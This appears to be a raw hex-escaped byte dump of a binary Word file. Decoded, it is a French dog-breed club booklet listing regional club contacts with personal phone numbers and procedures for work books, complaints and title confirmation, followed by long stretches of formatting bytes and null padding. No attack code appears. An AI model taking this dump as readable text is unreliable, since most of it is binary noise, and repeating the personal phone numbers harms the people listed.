-"\x43\x4c\x53\x54\x07\x4d\x6c\x6c\x65\x20\x4d\x61\x73\x73\x61\x07" -"\x30\x32\x2e\x34\x37\x2e\x39\x34\x2e\x37\x38\x2e\x38\x32\x07\x54" -"\x6f\x75\x72\x73\x07\x50\x56\x4c\x07\x07\x37\x32\x07\x43\x4c\x55" -"\x42\x07\x4d\x2e\x20\x46\x65\x75\x76\x72\x69\x65\x72\x07\x30\x32" -"\x2e\x34\x33\x2e\x32\x30\x2e\x35\x36\x2e\x32\x36\x07\x4c\x61\x20" -"\x43\x68\x61\x70\x65\x6c\x6c\x65\x20\x53\x74\x20\x46\x72\x61\x79" -"\x07\x50\x56\x4c\x07\x07\x33\x31\x07\x43\x4c\x4d\x50\x07\x4d\x2e" -"\x20\x4d\x61\x67\x72\x65\x74\x07\x30\x35\x20\x36\x33\x20\x32\x36" -"\x20\x34\x33\x20\x30\x38\x07\x4d\x6f\x6e\x74\x61\x75\x62\x61\x6e" -"\x07\x45\x4e\x43\x07\x07\x36\x33\x07\x43\x4c\x53\x43\x41\x42\x07" -"\x4d\x6d\x65\x20\x4d\x69\x6e\x65\x74\x2d\x42\x61\x72\x64\x6f\x74" -"\x07\x30\x34\x2e\x37\x30\x2e\x30\x36\x2e\x30\x39\x2e\x33\x37\x07" -"\x54\x68\x69\x65\x72\x73\x07\x45\x4e\x43\x07\x07\x30\x33\x07\x52" -"\x43\x4c\x59\x07\x4d\xa0\x2e\x47\x61\x77\x6c\x61\x73\x20\x52\x69" -"\x63\x68\x61\x72\x64\x07\x07\x59\x7a\x65\x75\x72\x65\x07\x53\x74" -"\x61\x67\x65\x2d\x65\x6e\x74\x72\x2e\x20\x45\x4e\x43\x07\x07\x36" -"\x34\x07\x43\x50\x4c\x53\x07\x4d\x6d\x65\x20\x47\x72\x6f\x6c\x65" -"\x74\x07\x30\x35\x2e\x35\x39\x2e\x30\x36\x2e\x32\x35\x2e\x35\x37" 
-"\x07\x50\x61\x75\x07\x45\x6e\x74\x72\x61\x69\x6e\x65\x6d\x65\x6e" -"\x74\x73\x07\x07\x37\x30\x07\x4c\x43\x41\x07\x4d\x6d\x65\x2e\x20" -"\x47\x69\x72\x61\x72\x64\x07\x30\x33\x2e\x38\x34\x2e\x37\x36\x2e" -"\x30\x35\x2e\x39\x31\x07\x4c\x61\x66\x65\x72\x74\xe9\x20\x73\x2f" -"\x61\x6d\x61\x6e\x63\x65\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07" -"\x30\x33\x07\x52\x43\x4c\x43\x07\x4d\x2e\x20\x4d\x6f\x6e\x65\x74" -"\x07\x30\x34\x2e\x37\x30\x2e\x35\x31\x2e\x37\x30\x2e\x34\x31\xa4" -"\x4d\x6f\x6e\x74\x6d\x61\x72\x61\x75\x6c\x74\x07\x50\x56\x4c\x07" -"\x07\x36\x39\x07\x52\x43\x52\x07\x4d\x6d\x65\x20\x4f\x70\x69\x6e" -"\x65\x6c\x07\x30\x34\x2e\x37\x32\x2e\x38\x38\x2e\x32\x39\x2e\x32" -"\x36\x07\x43\x68\x61\x74\x69\x6c\x6c\x6f\x6e\x20\x4c\x61\x50\x61" -"\x6c\x75\x64\x07\x45\x4e\x43\x07\x07\x31\x33\x07\x54\x43\x50\x4c" -"\x43\x07\x4d\x2e\x20\x43\x72\x6f\x69\x6e\x07\x30\x34\x2e\x39\x30" -"\x2e\x33\x38\x2e\x38\x35\x2e\x30\x30\x07\x4d\x6f\x6e\x74\x65\x75" -"\x78\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07\x32\x39\x07\x41\x4c" -"\x50\x43\x07\x4d\x6d\x65\x20\x51\x75\xe9\x61\x75\x07\x30\x32\x2e" -"\x39\x38\x2e\x37\x38\x2e\x34\x34\x2e\x31\x37\x07\x50\x6c\x65\x79" -"\x62\x65\x72\x2d\x43\x68\x72\x69\x73\x74\x07\x45\x4e\x43\x07\x07" -"\x35\x34\x07\x43\x43\x4c\x07\x4d\x2e\x20\x4d\x6f\x72\x69\x6e\x65" -"\x61\x75\x20\x52\x6f\x6e\x61\x6e\x07\x30\x33\x2e\x32\x39\x2e\x33" -"\x38\x2e\x38\x35\x2e\x33\x38\x07\x4e\x61\x6e\x63\x79\x07\x53\x74" -"\x61\x67\x65\x20\x2d\x45\x6e\x74\x2e\x20\x50\x56\x4c\x07\x07\x38" -"\x38\x07\x43\x4c\x56\x4d\x07\x4d\x2e\x20\x53\x65\x72\x67\x65\x20" -"\x48\x65\x69\x6d\x6c\x69\x63\x68\x07\x30\x33\x2e\x38\x37\x2e\x36" -"\x34\x2e\x35\x32\x2e\x32\x30\x07\x4a\x65\x61\x6e\x6d\x65\x6e\x69" -"\x6c\x07\x50\x56\x4c\x07\x07\x37\x38\x07\x4e\x41\x4c\x4c\x07\x4d" -"\x6d\x65\x20\x54\x75\x6d\x61\x07\x30\x31\x2e\x33\x34\x2e\x36\x32" -"\x2e\x34\x30\x2e\x31\x33\x07\x53\x6f\x69\x73\x73\x6f\x6e\x73\x07" -"\x45\x4e\x43\x07\x07\x31\x33\x07\x43\x41\x4c\x43\x07\x4d\x2e\x20" 
-"\x42\xe9\x72\x65\x6e\x67\x65\x72\x07\x30\x34\x2e\x34\x32\x2e\x30" -"\x33\x2e\x30\x31\x2e\x39\x31\x07\x4f\x72\x61\x69\x73\x6f\x6e\x07" -"\x45\x4e\x43\x07\x07\x33\x36\x07\x43\x4c\x53\x33\x36\x07\x4d\x2e" -"\x20\x54\x69\x73\x73\x65\x75\x72\x07\x30\x32\x2e\x35\x34\x2e\x32" -"\x37\x2e\x37\x31\x2e\x33\x35\x07\x43\x68\x61\x74\x65\x61\x75\x72" -"\x6f\x75\x78\x07\x20\x50\x56\x4c\x07\x07\x38\x36\x07\x43\x4c\x53" -"\x4c\x07\x4d\x2e\x20\x42\x69\x6c\x6c\x61\x72\x64\x07\x30\x35\x2e" -"\x34\x39\x2e\x35\x38\x2e\x31\x39\x2e\x38\x38\x07\x50\x6f\x69\x74" -"\x69\x65\x72\x73\x07\x53\x74\x61\x67\x65\x20\x50\x56\x4c\x2d\x45" -"\x4e\x43\x07\x07\x36\x36\x07\x33\x43\x4c\x07\x4d\x2e\x20\x4c\x61" -"\x66\x6f\x6e\x74\x07\x30\x34\x2e\x36\x38\x2e\x36\x31\x2e\x30\x30" -"\x2e\x34\x38\x07\x50\x65\x72\x70\x69\x67\x6e\x61\x6e\x07\x45\x6e" -"\x74\x72\x61\x69\x6e\x65\x6d\x65\x6e\x74\x73\x07\x07\x0d\x56\x6f" -"\x75\x73\x20\x70\x6f\x75\x72\x72\x65\x7a\x20\x76\x6f\x75\x73\x20" -"\x70\x72\x6f\x63\x75\x72\x65\x72\x20\x6c\x65\x73\x20\x61\x64\x72" -"\x65\x73\x73\x65\x73\x20\x64\x65\x20\x63\x65\x73\x20\x63\x6c\x75" -"\x62\x73\x20\xe0\x20\x76\x6f\x74\x72\x65\x20\x53\x6f\x63\x69\xe9" -"\x74\xe9\x20\x43\x61\x6e\x69\x6e\x65\x20\x52\xe9\x67\x69\x6f\x6e" -"\x61\x6c\x65\x20\x6f\x75\x20\x4c\x6f\x63\x61\x6c\x65\x2c\x20\x6f" -"\x75\x20\xe0\x20\x6c\x61\x20\x53\x43\x43\x2c\x20\x6f\x75\x20\x61" -"\x75\x20\x73\x65\x63\x72\xe9\x74\x61\x72\x69\x61\x74\x20\x64\x65" -"\x20\x6c\x61\x20\x43\x2e\x4c\x0d\x53\x69\x20\x76\x6f\x75\x73\x20" -"\x61\x76\x65\x7a\x20\x70\x61\x72\x66\x6f\x69\x73\x20\x64\x75\x20" -"\x74\x65\x6d\x70\x73\x20\x64\x69\x73\x70\x6f\x6e\x69\x62\x6c\x65" -"\x2c\x20\x70\x72\x6f\x70\x6f\x73\x65\x7a\x2d\x76\x6f\x75\x73\x20" -"\x70\x6f\x75\x72\x20\x61\x69\x64\x65\x72\x20\xe0\x20\x65\x6e\x74" -"\x72\x65\x74\x65\x6e\x69\x72\x20\x6c\x61\x20\x70\x69\x73\x74\x65" -"\x2c\x20\x61\x73\x73\x75\x6d\x65\x72\x20\x61\x63\x63\x75\x65\x69" -"\x6c\x20\x65\x74\x20\x73\x65\x63\x72\xe9\x74\x61\x72\x69\x61\x74" 
-"\x2c\x20\x61\x69\x64\x65\x72\x20\x61\x75\x78\x20\x65\x6e\x74\x72" -"\x61\xee\x6e\x65\x6d\x65\x6e\x74\x73\x20\x65\x74\x20\xe9\x70\x72" -"\x65\x75\x76\x65\x73\x20\x6f\x66\x66\x69\x63\x69\x65\x6c\x6c\x65" -"\x73\x2e\x20\x4c\x65\x20\x73\x70\x6f\x72\x74\x20\x6c\xe9\x76\x72" -"\x69\x65\x72\x20\x65\x78\x69\x73\x74\x65\x20\x70\x6f\x75\x72\x20" -"\x76\x6f\x75\x73\x20\x6d\x61\x69\x73\x20\x61\x20\x62\x65\x73\x6f" -"\x69\x6e\x20\x64\x65\x20\x76\x6f\x75\x73\x2e\x0d\x4e\x27\x6f\x75" -"\x62\x6c\x69\x65\x7a\x20\x70\x61\x73\x20\x71\x75\x65\x20\x6c\x65" -"\x73\x20\xe9\x70\x72\x65\x75\x76\x65\x73\x20\x53\x2e\x43\x2e\x43" -"\x2e\x20\x6f\x6e\x74\x20\x70\x6f\x75\x72\x20\x62\x75\x74\x20\x6c" -"\x27\x61\x6d\xe9\x6c\x69\x6f\x72\x61\x74\x69\x6f\x6e\x20\x64\x65" -"\x73\x20\x72\x61\x63\x65\x73\x20\x64\x61\x6e\x73\x20\x75\x6e\x20" -"\x65\x73\x70\x72\x69\x74\x20\x61\x6d\x69\x63\x61\x6c\x20\x65\x74" -"\x20\x6e\x6f\x6e\x20\x6c\x65\x20\x73\x65\x75\x6c\x20\x70\x6c\x61" -"\x69\x73\x69\x72\x20\x64\x65\x20\x6c\x61\x20\x63\x6f\x6d\x70\xe9" -"\x74\x69\x74\x69\x6f\x6e\x20\x6d\xea\x6d\x65\x20\x73\x27\x69\x6c" -"\x20\x65\x73\x74\x20\x72\xe9\x65\x6c\x2e\x0d\x50\x6f\x75\x72\x20" -"\x6f\x62\x74\x65\x6e\x69\x72\x20\x75\x6e\x20\x63\x61\x72\x6e\x65" -"\x74\x20\x64\x65\x20\x74\x72\x61\x76\x61\x69\x6c\x20\x3a\x0d\x41" -"\x20\x6c\x61\x20\x53\x2e\x43\x2e\x43\x2e\x20\x96\x20\x73\x65\x72" -"\x76\x69\x63\x65\x20\x63\x61\x72\x6e\x65\x74\x20\x64\x65\x20\x74" -"\x72\x61\x76\x61\x69\x6c\x20\x2d\x20\x20\x65\x6e\x20\x70\x72\xe9" -"\x63\x69\x73\x61\x6e\x74\x20\x63\x61\x72\x6e\x65\x74\x20\x64\x65" -"\x20\x63\x6f\x75\x72\x73\x65\x20\x6f\x75\x20\x64\x65\x20\x70\x6f" -"\x75\x72\x73\x75\x69\x74\x65\x2c\x20\x61\x63\x63\x6f\x6d\x70\x61" -"\x67\x6e\xe9\x20\x64\x75\x20\x70\x72\x69\x78\x2e\x0d\x0d\x50\x6f" -"\x75\x72\x20\x74\x6f\x75\x74\x65\x20\x72\xe9\x63\x6c\x61\x6d\x61" -"\x74\x69\x6f\x6e\x20\x6f\x75\x20\x6c\x69\x74\x69\x67\x65\x20\x65" -"\x74\x20\x73\x75\x67\x67\x65\x73\x74\x69\x6f\x6e\x20\x73\x75\x72" 
-"\x20\x6c\x65\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74\x3a\x0d\x41" -"\x75\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74\x20\x6f\x75\x20\x73" -"\x65\x63\x72\xe9\x74\x61\x69\x72\x65\x20\x64\x65\x20\x6c\x61\x20" -"\x43\x2e\x4c\x2e\x2c\x20\x64\x69\x72\x65\x63\x74\x65\x6d\x65\x6e" -"\x74\x20\x6f\x75\x20\x76\x69\x61\x20\x6c\x61\x20\x53\x2e\x43\x2e" -"\x43\x2e\x0d\x0d\x50\x6f\x75\x72\x20\x74\x6f\x75\x74\x65\x20\x68" -"\x6f\x6d\x6f\x6c\x6f\x67\x61\x74\x69\x6f\x6e\x20\x64\x65\x20\x74" -"\x69\x74\x72\x65\x20\x61\x75\x20\x64\x6f\x73\x73\x69\x65\x72\x20" -"\x3a\x0d\x41\x75\x20\x53\x65\x63\x72\xe9\x74\x61\x69\x72\x65\x20" -"\x64\x65\x20\x6c\x61\x20\x43\x2e\x4c\x2e\x20\x64\x69\x72\x65\x63" -"\x74\x65\x6d\x65\x6e\x74\x20\x6f\x75\x20\x76\x69\x61\x20\x6c\x61" -"\x20\x53\x2e\x43\x2e\x43\x2e\x20\x61\x70\x72\xe8\x73\x20\x61\x76" -"\x6f\x69\x72\x20\x76\xe9\x72\x69\x66\x69\xe9\x20\x6c\x65\x73\x20" -"\x63\x6f\x6e\x64\x69\x74\x69\x6f\x6e\x73\x20\x61\x75\x70\x72\xe8" -"\x73\x20\x64\x65\x20\x76\x6f\x74\x72\x65\x20\x63\x6c\x75\x62\x2e" -"\x20\x53\x65\x75\x6c\x73\x20\x6c\x65\x73\x20\x64\x6f\x73\x73\x69" -"\x65\x72\x73\x20\x63\x65\x72\x74\x69\x66\x69\xe9\x73\x20\x63\x6f" -"\x6e\x66\x6f\x72\x6d\x65\x73\x20\x70\x61\x72\x20\x6c\x65\x73\x20" -"\x72\x65\x73\x70\x6f\x6e\x73\x61\x62\x6c\x65\x73\x20\x64\x65\x73" -"\x20\x43\x6c\x75\x62\x73\x20\x73\x65\x72\x6f\x6e\x74\x20\x61\x63" -"\x63\x65\x70\x74\xe9\x73\x2e\x0d\x0d\x50\x6f\x75\x72\x20\x74\x6f" -"\x75\x74\x65\x20\x71\x75\x65\x73\x74\x69\x6f\x6e\x20\x72\x65\x6c" -"\x61\x74\x69\x76\x65\x20\xe0\x20\x6c\x61\x20\x63\x6f\x6e\x66\x69" -"\x72\x6d\x61\x74\x69\x6f\x6e\x20\x3a\x0d\x41\x75\x20\x50\x72\xe9" -"\x73\x69\x64\x65\x6e\x74\x20\x64\x75\x20\x43\x6c\x75\x62\x20\x64" -"\x65\x20\x72\x61\x63\x65\x20\x63\x6f\x6e\x63\x65\x72\x6e\xe9\x2e" -"\x0d\x4c\x69\x76\x72\x65\x74\x20\xe9\x74\x61\x62\x6c\x69\x20\x70" -"\x61\x72\x20\x6c\x65\x20\x50\x72\x6f\x66\x65\x73\x73\x65\x75\x72" -"\x20\x47\x75\x79\x20\x51\x55\x45\x49\x4e\x4e\x45\x43\x2e\x0d\x4d" 
-"\x69\x73\x65\x20\xe0\x20\x6a\x6f\x75\x72\x20\x32\x30\x30\x36\x0d" -"\x50\x61\x67\x65\x20\x13\x20\x50\x41\x47\x45\x20\x14\x39\x15\x20" -"\x73\x75\x72\x20\x39\x0d\x50\x2e\x4d\x2f\x20\x4c\x2e\x50\x20\x96" -"\x20\x31\x35\x2f\x30\x32\x0d\x0d\x0d\x0d\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2b\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x06\x00\x00\x2d\x08\x00\x00\x6d\x08\x00\x00\x6e\x08\x00\x00" -"\x80\x08\x00\x00\x43\x09\x00\x00\x51\x09\x00\x00\x79\x09\x00\x00" -"\x81\x09\x00\x00\xf5\x0a\x00\x00\x10\x0b\x00\x00\x33\x0b\x00\x00" -"\x66\x0b\x00\x00\x63\x0d\x00\x00\x8a\x0d\x00\x00\xbd\x0e\x00\x00" -"\xf6\x0e\x00\x00\x98\x10\x00\x00\xb4\x10\x00\x00\x3a\x12\x00\x00" -"\x45\x12\x00\x00\x7f\x1b\x00\x00\x90\x1b\x00\x00\x11\x1c\x00\x00" -"\x15\x1c\x00\x00\x5e\x1d\x00\x00\x68\x1d\x00\x00\x6a\x1d\x00\x00" -"\x5f\x20\x00\x00\x61\x20\x00\x00\xa1\x20\x00\x00\xb3\x20\x00\x00" -"\x71\x23\x00\x00\x8d\x23\x00\x00\x3b\x26\x00\x00\x3d\x26\x00\x00" -"\x6a\x2b\x00\x00\x87\x2b\x00\x00\x88\x2b\x00\x00\x9b\x2b\x00\x00" -"\x42\x2c\x00\x00\x59\x2c\x00\x00\xdb\x3b\x00\x00\xe6\x3b\x00\x00" -"\x77\x3c\x00\x00\x85\x3c\x00\x00\x0a\x40\x00\x00\x18\x40\x00\x00" -"\x19\x40\x00\x00\x6c\x41\x00\x00\x74\x41\x00\x00\x75\x41\x00\x00" -"\x80\x41\x00\x00\x81\x41\x00\x00\xe6\x41\x00\x00\xf0\x41\x00\x00" -"\x4b\x42\x00\x00\x67\x42\x00\x00\xa1\x42\x00\x00\xac\x42\x00\x00" -"\x52\x43\x00\x00\x76\x43\x00\x00\xe3\x43\x00\x00\xf6\x43\x00\x00" -"\xc8\x44\x00\x00\xe0\x44\x00\x00\x67\x45\x00\x00\x76\x45\x00\x00" -"\x9b\x47\x00\x00\xa4\x47\x00\x00\xf8\xf1\xea\xe1\xdd\xd8\xdd\xd8" -"\xdd\xe1\xdd\xd1\xdd\xd1\xdd\xd1\xdd\xe1\xdd\xc8\xdd\xe1\xdd\xd1" -"\xdd\xd1\xc3\xdd\xc3\xdd\xc3\xdd\xc3\xdd\xc3\xdd\xc3\xdd\xe1\xdd" -"\xe1\xdd\xe1\xdd\xe1\xdd\xe1\xbc\xdd\xe1\xb5\xd1\xaf\xdd\xd1\xdd" -"\xd1\xdd\xd1\xdd\xd1\xdd\xd1\xdd\xd1\xdd\xd1\xdd\xd1\x00\x0a\x16" -"\x68\x45\x6d\x47\x00\x43\x4a\x18\x00\x00\x0c\x16\x68\x45\x6d\x47" -"\x00\x35\x08\x81\x3e\x2a\x01\x00\x0d\x16\x68\x45\x6d\x47\x00\x3e" 
-"\x2a\x01\x43\x4a\x1c\x00\x09\x16\x68\x45\x6d\x47\x00\x35\x08\x81" -"\x10\x16\x68\x45\x6d\x47\x00\x35\x08\x81\x3e\x2a\x01\x43\x4a\x18" -"\x00\x00\x0d\x16\x68\x45\x6d\x47\x00\x35\x08\x81\x43\x4a\x18\x00" -"\x09\x16\x68\x45\x6d\x47\x00\x36\x08\x81\x06\x16\x68\x45\x6d\x47" -"\x00\x00\x10\x16\x68\x45\x6d\x47\x00\x35\x08\x81\x3e\x2a\x01\x43" -"\x4a\x1c\x00\x00\x0d\x16\x68\x45\x6d\x47\x00\x35\x08\x81\x43\x4a" -"\x20\x00\x0c\x16\x68\x45\x6d\x47\x00\x35\x08\x81\x36\x08\x81\x00" -"\x0d\x16\x68\x45\x6d\x47\x00\x35\x08\x81\x43\x4a\x24\x00\x00\x45" -"\x00\x06\x00\x00\x2d\x08\x00\x00\x6e\x08\x00\x00\x81\x08\x00\x00" -"\xab\x0a\x00\x00\xf4\x0a\x00\x00\xf5\x0a\x00\x00\x11\x0b\x00\x00" -"\x32\x0b\x00\x00\x33\x0b\x00\x00\x66\x0b\x00\x00\x20\x0c\x00\x00" -"\xd3\x0c\x00\x00\x08\x0d\x00\x00\x62\x0d\x00\x00\xd8\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xae\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xa4\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x9a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x9a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x9a\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x92\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x8a\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x8a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x82\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8a\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8a\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x8a\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x8a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x07\x00\x00\x03\x24\x03\x12\x64\x68\x01\x01" -"\x00\x61\x24\x03\x00\x07\x00\x00\x03\x24\x03\x12\x64\x38\xff\x00" -"\x00\x61\x24\x03\x00\x07\x00\x00\x03\x24\x01\x12\x64\x68\x01\x01" -"\x00\x61\x24\x01\x00\x09\x00\x00\x03\x24\x03\x12\x64\x38\xff\x00" -"\x00\x13\xa4\x78\x00\x61\x24\x03\x00\x09\x00\x00\x03\x24\x01\x12" 
-"\x64\x68\x01\x01\x00\x13\xa4\x78\x00\x61\x24\x01\x00\x29\x00\x00" -"\x03\x24\x01\x12\x64\x68\x01\x01\x00\x24\x64\x04\x01\x00\x21\x25" -"\x64\x04\x01\x00\x24\x26\x64\x04\x01\x00\x21\x27\x64\x04\x01\x00" -"\x24\x4e\xc6\x08\x00\x00\x00\xff\x04\x01\x21\x00\x4f\xc6\x08\x00" -"\x00\x00\xff\x04\x01\x24\x00\x50\xc6\x08\x00\x00\x00\xff\x04\x01" -"\x21\x00\x51\xc6\x08\x00\x00\x00\xff\x04\x01\x24\x00\x61\x24\x01" -"\x00\x26\x00\x00\x12\x64\x68\x01\x01\x00\x24\x64\x04\x01\x00\x21" -"\x25\x64\x04\x01\x00\x24\x26\x64\x04\x01\x00\x21\x27\x64\x04\x01" -"\x00\x24\x4e\xc6\x08\x00\x00\x00\xff\x04\x01\x21\x00\x4f\xc6\x08" -"\x00\x00\x00\xff\x04\x01\x24\x00\x50\xc6\x08\x00\x00\x00\xff\x04" -"\x01\x21\x00\x51\xc6\x08\x00\x00\x00\xff\x04\x01\x24\x00\x00\x0e" -"\x00\x06\x00\x00\xdf\x7b\x00\x00\x19\x7c\x00\x00\xfe\xfe\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x83\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x37\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x01\x01\x02" -"\x62\x0d\x00\x00\x63\x0d\x00\x00\x8a\x0d\x00\x00\x18\x0e\x00\x00" -"\xbc\x0e\x00\x00\xbd\x0e\x00\x00\xf6\x0e\x00\x00\x97\x10\x00\x00" -"\x98\x10\x00\x00\xb5\x10\x00\x00\x39\x12\x00\x00\x3a\x12\x00\x00" -"\x46\x12\x00\x00\xbd\x12\x00\x00\xff\x12\x00\x00\xcd\x14\x00\xd8" -"\xe9\x16\x00\x00\x99\x17\x00\x00\xb8\x19\x00\x00\x12\x1a\x00\x00" -"\x2f\x1b\x00\x00\x7e\x1b\x00\x00\x7f\x1b\x00\x00\xfa\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xea\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xea\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xea\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xea\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xe2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xea\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xea\x00" 